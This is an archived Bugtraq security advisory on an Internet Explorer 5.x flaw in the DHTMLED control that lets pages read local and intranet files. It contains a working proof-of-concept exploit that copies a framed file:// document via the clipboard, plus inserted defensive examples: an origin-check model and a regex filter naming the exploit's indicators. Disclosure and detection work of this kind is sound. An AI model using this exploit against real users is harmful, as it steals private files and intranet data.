Bugtraq mailing list archives

IE 5.5 and 5.01 vulnerability - reading at least local and from any host text and parsed html files


From: joro () NAT BG (Georgi Guninski)
Date: Fri, 14 Jul 2000 14:30:29 +0300


Georgi Guninski security advisory #16, 2000

IE 5.5 and 5.01 vulnerability - reading at least local and from any host
text and parsed html files

Systems affected: IE 5.5 and 5.01 on Windows 98; probably other versions
as well, not tested.
Risk: Medium

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski is not liable for any damages caused by direct or indirect
use of the information or functionality provided by this program.
Georgi Guninski bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Description:
Internet Explorer 5.5 and 5.01 under Windows 98 (all other versions are
presumably also vulnerable) allow a web page to read text files and parsed
HTML files from the local disk and from any host.
A particular danger is reading parsed web pages from intranet web servers
behind a firewall, since the victim's browser fetches them from the inside.
It is also exploitable from an HTML email message in Outlook.
This is achieved with the DHTMLED ActiveX control.

Details:
The problem is in DHTMLED (DHTML Edit Control Safe for Scripting for IE5),
which is used for basic HTML editing.
It allows opening a page containing an IFRAME, but has problems with DOM
protection: the frame's document is exposed to the hosting page's script
regardless of where the frame was loaded from.
It is therefore possible to select the content of the IFRAME (which may be a
document residing anywhere, including on the local disk), copy it to the
clipboard and then read it back from the clipboard.
I have a feeling DHTMLED in combination with IFRAME may lead to more
dangerous security risks.
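The DOM protection the control lacks can be stated as an origin check. The following is an added example, not part of the advisory and not IE's own code: a small model of the same-origin rule that should be consulted before script in one document is handed another document's DOM, run over constructed URLs matching the advisory (the demo page on www.nat.bg, a file:// frame, and a hypothetical intranet host `intranet.example`). A file: document is treated as an opaque origin that matches nothing, which is why a local file must never be readable from an http page.

```javascript
// Added example: a model of the origin check that "DOM protection" is supposed
// to apply before script in one document may read another document's DOM.
// Illustrative code, not part of the advisory and not IE's own logic. The bug
// in the advisory is that DHTMLED hands the script dh.DOM.all.I1.document for
// a file:// frame without any such check.

function originOf(urlString) {
  let u;
  try {
    u = new URL(urlString);
  } catch (e) {
    return null;              // unparsable URL: deny rather than guess
  }
  // file: URLs have no meaningful host; treat each as an opaque origin that
  // matches nothing, so local files are never "same origin" with a web page.
  if (u.protocol === 'file:') return null;
  // Fill in default ports so http://host and http://host:80 compare equal.
  const defaultPort = { 'http:': '80', 'https:': '443' }[u.protocol] || '';
  const port = u.port || defaultPort;
  return `${u.protocol}//${u.hostname.toLowerCase()}:${port}`;
}

function isSameOrigin(a, b) {
  const oa = originOf(a), ob = originOf(b);
  return oa !== null && ob !== null && oa === ob;
}

// What a correctly protected DOM should answer when script running in
// scriptUrl asks for the document inside a frame loaded from frameUrl.
function mayReadFrameDocument(scriptUrl, frameUrl) {
  return isSameOrigin(scriptUrl, frameUrl);
}

// Constructed cases mirroring the advisory: the demo page framing a local
// file, a hypothetical intranet server, and (legitimately) its own host.
const cases = [
  ['http://www.nat.bg/~joro/dh2.html', 'file://c:/test.txt'],
  ['http://www.nat.bg/~joro/dh2.html', 'http://intranet.example/secret.html'],
  ['http://www.nat.bg/~joro/dh2.html', 'http://www.nat.bg:80/~joro/ifr2.html'],
];
for (const [page, frame] of cases) {
  const ok = mayReadFrameDocument(page, frame);
  console.log(`${page} -> ${frame}: ${ok ? 'allowed' : 'blocked'}`);
}
```

Only the third case is allowed; the first two are exactly the reads the advisory demonstrates, and a control that exposes the loaded DOM without asking this question exposes both.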

The code is:
------dh2.html--------------------------------
<!-- The posted listing omits the two elements the script refers to: the
     DHTMLED control instance "dh" and the textarea "S1" that the clipboard
     is pasted into. They are supplied here; the CLASSID is that of the
     DHTML Edit Control Safe for Scripting for IE5. -->
<OBJECT ID="dh" CLASSID="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" WIDTH=0 HEIGHT=0></OBJECT>
<TEXTAREA ID="S1" COLS=80 ROWS=20></TEXTAREA>
<SCRIPT>
alert("This page reads C:\\TEST.TXT\nYou may need to create it.");
function f1()
{
// Reach into the IFRAME's document through the control's DOM property; no
// origin check is applied although the frame holds a file:// document.
dh.DOM.all.I1.focus();
dh.DOM.all.I1.document.execCommand("selectall");
dh.DOM.all.I1.document.execCommand("copy");
// Paste the clipboard into a textarea this page can read.
r=document.all.S1.createTextRange();
r.execCommand("paste");
alert("Here is your file: "+S1.value);
}

function loadit()
{
dh.loadURL("http://www.nat.bg/~joro/ifr2.html");
//                 ^^^^^^^^^^^^^^ You may need to edit this
// Give the control time to load ifr2.html and its IFRAME before reading it.
setTimeout("f1()",5000);
}
setTimeout("loadit();",1000);
</SCRIPT>
---------------------------------------------------
---------ifr2.html---------------------------------
<HTML>
<!-- The framed document is a local file here; an intranet URL works the same way. -->
<IFRAME SRC="file://c:/test.txt" ID="I1" name="I1">
</IFRAME>
</HTML>
---------------------------------------------------

Demonstration is available at: http://www.nat.bg/~joro/dh2.html

Workaround: Disable Active Scripting, or disable "Run ActiveX controls and
plug-ins" (other workarounds probably exist).
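A mail gateway or HTTP proxy can also flag the pattern the exploit relies on before it reaches a vulnerable IE. The following is an added example, not part of the advisory and not any product's filter: it scans HTML for the DHTMLED object together with loadURL, a reach into the control's DOM, and scripted clipboard copy/paste, and runs over constructed sample documents (one mirroring the shape of dh2.html, one using the control only as an editor, one plain page). The indicator names and the verdict scheme are this example's own.

```javascript
// Added example: a content filter that flags the DHTMLED + IFRAME + clipboard
// pattern from this advisory in HTML mail or proxied pages. Illustrative code,
// not part of the advisory and not any product's filter. The sample documents
// at the bottom are constructed for this example.

// Each indicator is one building block of the exploit. The CLSID is that of the
// DHTML Edit Control Safe for Scripting for IE5; the "dhtmledit" alternative
// catches <OBJECT> tags that name the control by ProgID instead.
const INDICATORS = [
  { name: 'dhtmled-object',
    re: /<object[^>]*(?:2d360201-fff5-11d1-8d03-00a0c959bc0a|dhtmledit)/i },
  { name: 'loadurl',          re: /\.loadURL\s*\(/i },               // control loads a second page
  { name: 'frame-dom-reach',  re: /\.DOM\.all\./i },                 // script reaches into the loaded DOM
  { name: 'clipboard-copy',   re: /execCommand\s*\(\s*["']copy["']/i },
  { name: 'clipboard-paste',  re: /execCommand\s*\(\s*["']paste["']/i },
  { name: 'local-file-frame', re: /<iframe[^>]*src\s*=\s*["']?file:/i },
];

// Returns the indicator names found and a verdict. The control alone is
// legitimate (it is an editor), so it only earns 'review'; the control together
// with scripted copy or a reach into its DOM is the exploit shape and is blocked.
function scanHtml(html) {
  const hits = INDICATORS.filter(i => i.re.test(html)).map(i => i.name);
  const hasControl = hits.includes('dhtmled-object');
  const abuses = hits.includes('clipboard-copy') || hits.includes('frame-dom-reach');
  const verdict = hasControl && abuses ? 'block' : hits.length ? 'review' : 'pass';
  return { hits, verdict };
}

// Constructed sample 1: the shape of dh2.html (control, loadURL, DOM reach, copy).
const exploitLikeMail = `<OBJECT ID="dh" CLASSID="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"></OBJECT>
<SCRIPT>
dh.loadURL("http://www.nat.bg/~joro/ifr2.html");
dh.DOM.all.I1.document.execCommand("selectall");
dh.DOM.all.I1.document.execCommand("copy");
</SCRIPT>`;

// Constructed sample 2: the control embedded as an ordinary editor, nothing else.
const benignEditorPage = `<p>Type your message:</p>
<OBJECT ID="editor" CLASSID="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" WIDTH=400 HEIGHT=200></OBJECT>`;

// Constructed sample 3: no indicators at all.
const plainPage = '<html><body>Hello</body></html>';

const samples = [['exploit-like', exploitLikeMail], ['editor', benignEditorPage], ['plain', plainPage]];
for (const [label, doc] of samples) {
  const r = scanHtml(doc);
  console.log(`${label}: ${r.verdict} (${r.hits.join(', ') || 'no indicators'})`);
}
```

The verdict deliberately does not block on the control alone: a single indicator is a reason to look, and only the combination that reproduces the advisory's steps is treated as hostile.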

Copyright 2000 Georgi Guninski

Regards,
Georgi Guninski
http://www.nat.bg/~joro

